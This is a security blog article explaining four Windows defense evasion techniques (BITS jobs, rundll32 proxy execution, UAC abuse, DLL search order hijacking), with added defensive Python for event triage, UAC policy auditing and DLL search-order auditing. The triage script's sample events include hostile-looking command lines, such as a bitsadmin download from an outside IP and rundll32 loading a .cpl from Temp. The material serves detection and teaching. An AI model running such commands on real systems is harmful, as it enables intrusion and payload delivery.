In today’s cybersecurity space, adversaries go to great lengths to evade detection, blending in with normal activity to keep their attacks concealed. When hunters uncover their latest malicious activity, adversaries typically change tactics and find a new technique to lurk in the shadows. One popular way they avoid detection is by employing defense evasion tactics.
Every professional in the digital space must understand the objectives of adversaries’ attacks to properly align defenses with rapidly changing attack tactics. This blog offers in-depth insight into how defense evasion tactics are emerging and evolving as a threat and identifies crucial areas on which to focus security efforts.
Popular Defensive Evasion Tactics
Evasion techniques are intentionally designed to avoid technological protections; they use native capabilities to blend in with expected activity. Adversaries exploit and manipulate trusted processes to conceal and disguise their malware. Here are some of the most popular defense evasion tactics that have been observed in the technology security space in recent years.
1. Background Intelligent Transfer Service (BITS) Jobs
BITS is a service accessible on the Windows operating system and the default method through which Microsoft distributes Windows updates to customers worldwide. BITS is used by applications and system components, such as Windows Update, to send operating system and application updates so that they can be downloaded with minimal disruption.
Adversaries can abuse BITS jobs, which schedule these file transfers, to download and execute files. Because BITS is present on many hosts and widely used in legitimate administrative contexts, BITS jobs are attractive to adversaries attempting to upload or download files unnoticed.
BITS was developed to work in unison with Windows applications, downloading and uploading data in the background. As a result, the service can be used to get past firewalls that block harmful or unknown processes, and it can disguise which application is actually requesting or downloading data from the internet.
2. Signed Binary Proxy Execution: Rundll32
Signed binary proxy execution uses legitimate built-in utilities to execute malicious commands. Adversaries use reputable, widely deployed tools that are signed with digital certificates to proxy the execution of malicious programs.
Adversaries can use rundll32.exe to facilitate the execution of malicious code. Loading a DLL through rundll32.exe rather than from the adversary’s own process (i.e. as a shared module) may avoid triggering security tools that do not monitor rundll32.exe execution because of the false positives it generates during routine activity. Rundll32.exe is frequently associated with the execution of DLL payloads. It can also run Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser, and it is launched automatically when a user double-clicks a .cpl file.
In one intrusion observed by OverWatch, the malicious DLL spawned a rundll32.exe child process that interacted with explorer.exe, and WIZARD SPIDER then conducted host reconnaissance from the trusted explorer.exe process. OverWatch alerted the victim organization early in the intrusion and gave it the information it needed to stop the attacker before they could penetrate deeper into the network or execute any ransomware payloads.
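Both the BITS and the rundll32.exe behaviours described above leave traces in process-creation telemetry. The following Python is an added example written for this article, not code from the original post or from any vendor. It runs a few simple triage rules over constructed Sysmon-style process-creation records (the field names, the ALLOWED_DOWNLOAD_HOSTS allow-list and the user-writable path markers are assumptions) and flags BITS transfers from hosts outside the allow-list, rundll32.exe started without a DLL argument, .cpl or DLL payloads loaded from user-writable directories, and rundll32.exe spawned by a parent living in a user-writable location.

```python
import ntpath
import re
from urllib.parse import urlparse

# Constructed sample events in a Sysmon-like shape; none of this is real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer upd /download /priority high http://203.0.113.7/p.dat C:\Users\Public\p.dat",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell -c Start-BitsTransfer -Source https://update.contoso.com/patch.msi -Destination C:\Temp\patch.msi",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\bob\AppData\Local\Temp\x.cpl",
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe",
     "ParentImage": r"C:\Users\bob\Downloads\invoice.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL C:\Windows\System32\timedate.cpl",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

ALLOWED_DOWNLOAD_HOSTS = {"update.contoso.com"}          # assumed allow-list of update sources
USER_WRITABLE = ("/appdata/", "/temp/", "/users/public/", "/downloads/")  # assumed markers
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)


def _norm(path):
    """Lower-case a Windows path and use forward slashes so markers match reliably."""
    return path.replace("\\", "/").lower()


def in_user_writable(path):
    return any(marker in _norm(path) for marker in USER_WRITABLE)


def check_bits(event):
    """Flag BITS transfers (bitsadmin.exe or Start-BitsTransfer) from non-allow-listed hosts."""
    cmd = event["CommandLine"]
    low = cmd.lower()
    image = ntpath.basename(event["Image"]).lower()
    is_bitsadmin = image == "bitsadmin.exe" and ("/transfer" in low or "/addfile" in low)
    is_ps_bits = "start-bitstransfer" in low
    if not (is_bitsadmin or is_ps_bits):
        return []
    findings = []
    for url in URL_RE.findall(cmd):
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_DOWNLOAD_HOSTS:
            findings.append(("bits_unapproved_source", f"{image} fetching from {host}"))
    return findings


def check_rundll32(event):
    """Flag rundll32.exe invocations whose argument or parent points at user-writable paths."""
    image = ntpath.basename(event["Image"]).lower()
    if image != "rundll32.exe":
        return []
    cmd = event["CommandLine"].strip()
    args = cmd.split(None, 1)[1] if " " in cmd else ""
    findings = []
    if not args:
        # rundll32 with no DLL to run is a common injection host rather than a normal use.
        findings.append(("rundll32_no_args", "rundll32.exe started with no DLL argument"))
    low = args.lower()
    if "control_rundll" in low:          # covers Control_RunDLL and Control_RunDLLAsUser
        cpl = re.search(r"(\S+\.cpl)", args, re.IGNORECASE)
        if cpl and in_user_writable(cpl.group(1)):
            findings.append(("rundll32_cpl_user_path", f".cpl loaded from {cpl.group(1)}"))
    elif args and in_user_writable(args.split(",")[0]):
        findings.append(("rundll32_dll_user_path", f"DLL loaded from {args.split(',')[0]}"))
    if in_user_writable(event["ParentImage"]):
        findings.append(("rundll32_suspicious_parent", f"parent {event['ParentImage']}"))
    return findings


def triage(events):
    """Run every rule over every event and return the findings in event order."""
    results = []
    for ev in events:
        for rule, detail in check_bits(ev) + check_rundll32(ev):
            results.append({"rule": rule, "image": ev["Image"], "detail": detail})
    return results


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The rules deliberately stay narrow: an allow-listed BITS download and a .cpl loaded from System32 produce no finding, while the same tooling pointed at user-writable locations or unknown hosts does. In a real deployment the allow-list would come from the organisation's patch infrastructure and the markers from its endpoint baseline.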
3. Abuse Elevation Control Mechanism
Adversaries can abuse mechanisms designed to control privilege elevation in order to obtain higher-level permissions. Most modern systems include native elevation control mechanisms that limit the privileges a user can exercise on a machine. Specific users must be authorized before they can execute potentially dangerous tasks. An attacker can use a variety of techniques to exploit these built-in control mechanisms and escalate privileges on a system.
Adversaries can circumvent UAC mechanisms to obtain system-wide process privileges. Windows User Account Control (UAC) allows a program to raise its rights (tracked as integrity levels ranging from low to high) to accomplish a task with administrator-level permissions, possibly by prompting the user for confirmation.
The impact on the user ranges from the operation being refused under strict enforcement, to the user being allowed to perform the action if they are a member of the local Administrators group and click through the prompt, to an administrator password being required to complete the action.
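The prompting behaviour just described is governed by a handful of registry values under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. The Python below is an added example, not part of the original article: it assesses a snapshot of those values and reports settings that make elevation easier to abuse, such as silent elevation for administrators or prompts not shown on the secure desktop. The value meanings are Microsoft's documented ones; the WEAK_POLICY and HARDENED_POLICY dictionaries are constructed snapshots, and read_uac_policy (which uses the standard winreg module) only does anything on a Windows host.

```python
import platform

UAC_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"

# Documented meanings of ConsentPromptBehaviorAdmin.
ADMIN_PROMPT_BEHAVIOR = {
    0: "elevate without prompting",
    1: "prompt for credentials on the secure desktop",
    2: "prompt for consent on the secure desktop",
    3: "prompt for credentials",
    4: "prompt for consent",
    5: "prompt for consent for non-Windows binaries (default)",
}

# Constructed snapshots: one weak, one hardened. Absent keys fall back to Windows defaults.
WEAK_POLICY = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 0, "PromptOnSecureDesktop": 0}
HARDENED_POLICY = {"EnableLUA": 1, "ConsentPromptBehaviorAdmin": 2,
                   "PromptOnSecureDesktop": 1, "ConsentPromptBehaviorUser": 0}


def assess_uac(policy):
    """Return (severity, message) tuples for UAC settings that weaken elevation control."""
    issues = []
    if policy.get("EnableLUA", 1) == 0:
        issues.append(("high", "EnableLUA=0: UAC is off; administrators' processes start at "
                               "high integrity without any prompt"))
        return issues  # the other values are irrelevant once UAC itself is disabled
    admin = policy.get("ConsentPromptBehaviorAdmin", 5)
    if admin == 0:
        issues.append(("high", f"ConsentPromptBehaviorAdmin=0: {ADMIN_PROMPT_BEHAVIOR[0]}; "
                               "a bypass needs no user interaction at all"))
    elif admin in (3, 4):
        issues.append(("medium", f"ConsentPromptBehaviorAdmin={admin}: {ADMIN_PROMPT_BEHAVIOR[admin]} "
                                 "on the interactive desktop rather than the secure desktop"))
    elif admin == 5:
        issues.append(("low", "ConsentPromptBehaviorAdmin=5: signed Windows binaries elevate "
                              "without a prompt; 1 or 2 prompts for everything"))
    if policy.get("PromptOnSecureDesktop", 1) == 0:
        issues.append(("medium", "PromptOnSecureDesktop=0: the prompt is drawn on the interactive "
                                 "desktop, where other user processes can interact with it"))
    if policy.get("ConsentPromptBehaviorUser", 3) != 0:
        issues.append(("low", "ConsentPromptBehaviorUser!=0: standard users get a credential "
                              "prompt instead of an automatic denial"))
    return issues


def read_uac_policy():
    """Read the live values on a Windows host; returns {} on any other platform."""
    if platform.system() != "Windows":
        return {}
    import winreg  # only importable on Windows
    names = ("EnableLUA", "ConsentPromptBehaviorAdmin",
             "ConsentPromptBehaviorUser", "PromptOnSecureDesktop")
    policy = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, UAC_KEY) as key:
        for name in names:
            try:
                policy[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                pass  # value not set: assess_uac() applies the Windows default
    return policy


if __name__ == "__main__":
    for label, snapshot in (("weak", WEAK_POLICY), ("hardened", HARDENED_POLICY),
                            ("live", read_uac_policy())):
        print(label, assess_uac(snapshot))
```

Against the hardened snapshot the assessment is empty; against the weak one it reports silent administrator elevation and the missing secure desktop, plus the default standard-user prompt. A snapshot of an out-of-the-box configuration only draws the two low-severity notes.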
4. Hijack Execution Flow: DLL Search Order Hijacking
By hijacking the search order used to load DLLs, adversaries can execute their own malicious payloads. Windows follows a defined search order to locate the DLLs an application needs to load. Hijacking DLL loading can be used to establish persistence, escalate privileges, and/or circumvent restrictions on file execution.
An adversary can hijack DLL loading in a variety of ways. Adversaries may place trojanized dynamic-link library files (DLLs) in a directory that is searched before the location of the legitimate library a program requests, causing Windows to load the malicious library when the victim program calls for it. Adversaries may also use DLL preloading, also known as binary planting, to place a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL.
Adversaries can also directly affect the search order by enabling DLL redirection, which causes a program to load a different DLL once it is enabled (through the Registry and the creation of a redirection file). If a program vulnerable to search order hijacking is set to run at a higher privilege level, the adversary-controlled DLL it loads will execute at that same level. Depending on the program, the technique can be used to escalate privileges from user to administrator or SYSTEM, or from administrator to SYSTEM. Programs whose search path has been hijacked may appear to run normally, because the malicious DLL can be written to load the genuine DLL it was designed to replace.
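The search order described above can be audited from the defender's side before anything is planted. The Python below is an added example, not code from the article: it models the documented default Windows DLL search order (application directory, System32, the 16-bit System directory, the Windows directory, the current directory, then PATH; with SafeDllSearchMode disabled the current directory moves to second place), treats KnownDLLs as always coming from System32, and checks an executable's imports against a constructed host snapshot (SAMPLE_HOST, its directories and DLL names are assumptions). It reports imports that already resolve from a user-writable directory, imports that exist nowhere (so any writable directory on the path would satisfy them), legitimate DLLs for which a writable directory is searched first, and a .local redirection file sitting next to the executable.

```python
import ntpath
from dataclasses import dataclass


@dataclass
class Host:
    """Constructed snapshot of a Windows host; not read from a live system."""
    files: dict               # directory -> set of lower-case file names it contains
    writable: set             # directories the (non-admin) user can write to
    known_dlls: set           # names listed under Session Manager\KnownDLLs
    path: list                # entries of the PATH environment variable
    safe_search: bool = True  # SafeDllSearchMode, on by default
    system32: str = r"C:\Windows\System32"
    windows: str = r"C:\Windows"


def search_order(host, app_dir, cwd):
    """Directories in the order the loader consults them for an unqualified DLL name."""
    if host.safe_search:
        order = [app_dir, host.system32, host.windows + r"\System", host.windows, cwd]
    else:  # SafeDllSearchMode off: current directory is searched right after the app dir
        order = [app_dir, cwd, host.system32, host.windows + r"\System", host.windows]
    order += host.path
    seen, unique = set(), []
    for d in order:
        if d.lower() not in seen:
            seen.add(d.lower())
            unique.append(d)
    return unique


def resolve(host, dll, app_dir, cwd):
    """Return (directory the loader would pick, writable directories it searched first)."""
    name = dll.lower()
    if name in host.known_dlls:
        return host.system32, []  # KnownDLLs are mapped from System32, never from the search path
    writable_before = []
    for d in search_order(host, app_dir, cwd):
        if name in host.files.get(d, set()):
            return d, writable_before
        if d in host.writable:
            writable_before.append(d)  # a copy planted here would have been picked
    return None, writable_before


def audit(host, app_path, imports, cwd):
    """Flag imports of app_path that a user-writable directory could satisfy."""
    app_dir, app_name = ntpath.dirname(app_path), ntpath.basename(app_path).lower()
    findings = []
    if f"{app_name}.local" in host.files.get(app_dir, set()):
        # A .local file redirects DLL loading to the application directory first.
        findings.append((app_name, "redirection_file_present", [app_dir]))
    for dll in imports:
        chosen, exposed = resolve(host, dll, app_dir, cwd)
        if chosen is None:
            findings.append((dll, "missing_dll", exposed))
        elif chosen in host.writable:
            findings.append((dll, "loaded_from_writable", [chosen]))
        elif exposed:
            findings.append((dll, "writable_dir_searched_first", exposed))
    return findings


# Constructed snapshot: a vendor app under Program Files and a user tool directory on PATH.
SAMPLE_HOST = Host(
    files={
        r"C:\Windows\System32": {"kernel32.dll", "version.dll", "dwmapi.dll"},
        r"C:\Program Files\Acme\App": {"app.exe"},
        r"C:\Users\bob\Tools": {"tool.exe", "tool.exe.local", "helper.dll"},
    },
    writable={r"C:\Users\bob\Tools", r"C:\Users\bob\Downloads"},
    known_dlls={"kernel32.dll", "ntdll.dll", "user32.dll"},
    path=[r"C:\Users\bob\Tools", r"C:\Windows\System32"],
)

if __name__ == "__main__":
    for f in audit(SAMPLE_HOST, r"C:\Program Files\Acme\App\app.exe",
                   ["kernel32.dll", "version.dll", "helper.dll", "plugin.dll"],
                   r"C:\Users\bob\Downloads"):
        print(f)
    for f in audit(SAMPLE_HOST, r"C:\Users\bob\Tools\tool.exe", ["version.dll"],
                   r"C:\Users\bob\Tools"):
        print(f)
```

For the Program Files application, kernel32.dll (a KnownDLL) and version.dll (found in System32 before any writable directory) are clean, helper.dll already resolves from the user's Tools directory, and the non-existent plugin.dll could be satisfied from the current directory or from Tools. For the tool launched from a writable directory, version.dll is reported because that directory is searched before System32, and the tool.exe.local file is reported as a redirection that would pull DLLs from the same place.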
Importance of Staying Updated on Defense Evasion Tactics
When it comes to defense evasion, the tactics outlined in this article are just the tip of the iceberg. In many cases these techniques make use of genuine software features, which makes purely signature-based detection difficult.
Experts advise that cyberspace professionals familiarize themselves with the standard network settings and activities required for security in their field. Interestingly, there is a never-ending Batman-and-the-Joker interaction between cyberattack and defense, as both sides are always co-evolving. Although this love-hate dynamic in the digital security ecosystem may never cease, every individual must contribute their fair share towards overall cybersecurity.